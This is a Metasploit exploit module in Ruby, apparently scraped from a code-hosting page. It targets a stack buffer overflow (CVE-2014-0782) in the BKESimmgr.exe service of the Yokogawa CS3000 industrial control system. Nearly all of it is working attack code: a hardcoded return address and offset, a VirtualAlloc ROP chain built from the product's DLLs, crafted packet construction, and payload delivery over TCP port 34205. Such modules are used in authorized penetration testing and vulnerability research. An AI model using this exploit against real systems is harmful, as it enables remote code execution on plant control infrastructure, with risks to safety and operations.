Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Yokogawa CS3000 BKESimmgr.exe Buffer Overflow',
14
      'Description'    => %q{
15
        This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability
16
        exists in the BKESimmgr.exe service when handling specially crafted packets, due to an
17
        insecure usage of memcpy, using attacker controlled data as the size count. This module
18
        has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows
19
        2003 SP2.
20
      },
21
      'Author'         =>
22
        [
23
          'juan vazquez',
24
          'Redsadic <julian.vilas[at]gmail.com>'
25
        ],
26
      'References'     =>
27
        [
28
          ['CVE', '2014-0782'],
29
          ['URL', 'https://www.rapid7.com/blog/post/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities'],
30
          ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf']
31
        ],
32
      'Payload'        =>
33
        {
34
          'Space'          => 340,
35
          'DisableNops'    => true,
36
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
37
        },
38
      'Platform'       => 'win',
39
      'Targets'        =>
40
        [
41
          [
42
            'Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]',
43
            {
44
              'Ret'           => 0x61d1274f, # 0x61d1274f # ADD ESP,10 # RETN # libbkebatchepa.dll
45
              'Offset'        => 64,
46
              'FakeArgument1' => 0x0040E65C, # ptr to .data on BKESimmgr.exe
47
              'FakeArgument2' => 0x0040EB90  # ptr to .data on BKESimmgr.exe
48
            }
49
          ],
50
        ],
51
      'DisclosureDate' => '2014-03-10',
52
      'DefaultTarget'  => 0))
53

54
    register_options(
55
      [
56
        Opt::RPORT(34205)
57
      ])
58
  end
59

60
  def check
61
    data = create_pkt(rand_text_alpha(4))
62

63
    res = send_pkt(data)
64

65
    if res && res.length == 10
66
      simmgr_res = parse_response(res)
67

68
      if valid_response?(simmgr_res)
69
        check_code = Exploit::CheckCode::Appears
70
      else
71
        check_code = Exploit::CheckCode::Safe
72
      end
73
    else
74
      check_code = Exploit::CheckCode::Safe
75
    end
76

77
    check_code
78
  end
79

80
  def exploit
81
    bof = rand_text(target['Offset'])
82
    bof << [target.ret].pack("V")
83
    bof << [target['FakeArgument1']].pack("V")
84
    bof << [target['FakeArgument2']].pack("V")
85
    bof << rand_text(16)  # padding (corrupted bytes)
86
    bof << create_rop_chain
87
    bof << payload.encoded
88

89
    data = [0x1].pack("N")         # Sub-operation id, <= 0x8 in order to pass the check at sub_4090B0
90
    data << [bof.length].pack("n")
91
    data << bof
92

93
    pkt = create_pkt(data)
94

95
    print_status("Trying target #{target.name}, sending #{pkt.length} bytes...")
96
    connect
97
    sock.put(pkt)
98
    disconnect
99
  end
100

101
  def create_rop_chain
102
    # rop chain generated with mona.py - www.corelan.be
103
    rop_gadgets =
104
      [
105
        0x004047ca, # POP ECX # RETN [BKESimmgr.exe]
106
        0x610e3024, # ptr to &VirtualAlloc() [IAT libbkfmtvrecinfo.dll]
107
        0x61232d60, # MOV EAX,DWORD PTR DS:[ECX] # RETN [LibBKESysVWinList.dll]
108
        0x61d19e6a, # XCHG EAX,ESI # RETN [libbkebatchepa.dll]
109
        0x619436d3, # POP EBP # RETN [libbkeeda.dll]
110
        0x61615424, # & push esp #  ret  [libbkeldc.dll]
111
        0x61e56c8e, # POP EBX # RETN [LibBKCCommon.dll]
112
        0x00000001, # 0x00000001-> ebx
113
        0x61910021, # POP EDX # ADD AL,0 # MOV EAX,6191002A # RETN [libbkeeda.dll]
114
        0x00001000, # 0x00001000-> edx
115
        0x0040765a, # POP ECX # RETN [BKESimmgr.exe]
116
        0x00000040, # 0x00000040-> ecx
117
        0x6191aaab, # POP EDI # RETN [libbkeeda.dll]
118
        0x61e58e04, # RETN (ROP NOP) [LibBKCCommon.dll]
119
        0x00405ffa, # POP EAX # RETN [BKESimmgr.exe]
120
        0x90909090, # nop
121
        0x619532eb  # PUSHAD # RETN [libbkeeda.dll]
122
      ].pack("V*")
123

124
    rop_gadgets
125
  end
126

127
  def create_pkt(data)
128
    pkt = [0x01].pack("N")         # Operation Identifier
129
    pkt << [data.length].pack("n") # length
130
    pkt << data                    # Fake packet
131

132
    pkt
133
  end
134

135
  def send_pkt(data)
136
    connect
137
    sock.put(data)
138
    res = sock.get_once
139
    disconnect
140

141
    res
142
  end
143

144
  def parse_response(data)
145
    data.unpack("NnN")
146
  end
147

148
  def valid_response?(data)
149
    valid = false
150

151
    if data && data[0] == 1 && data[1] == 4 && data[1] == 4 && data[2] == 5
152
      valid = true
153
    end
154

155
    valid
156
  end
157
end
158

159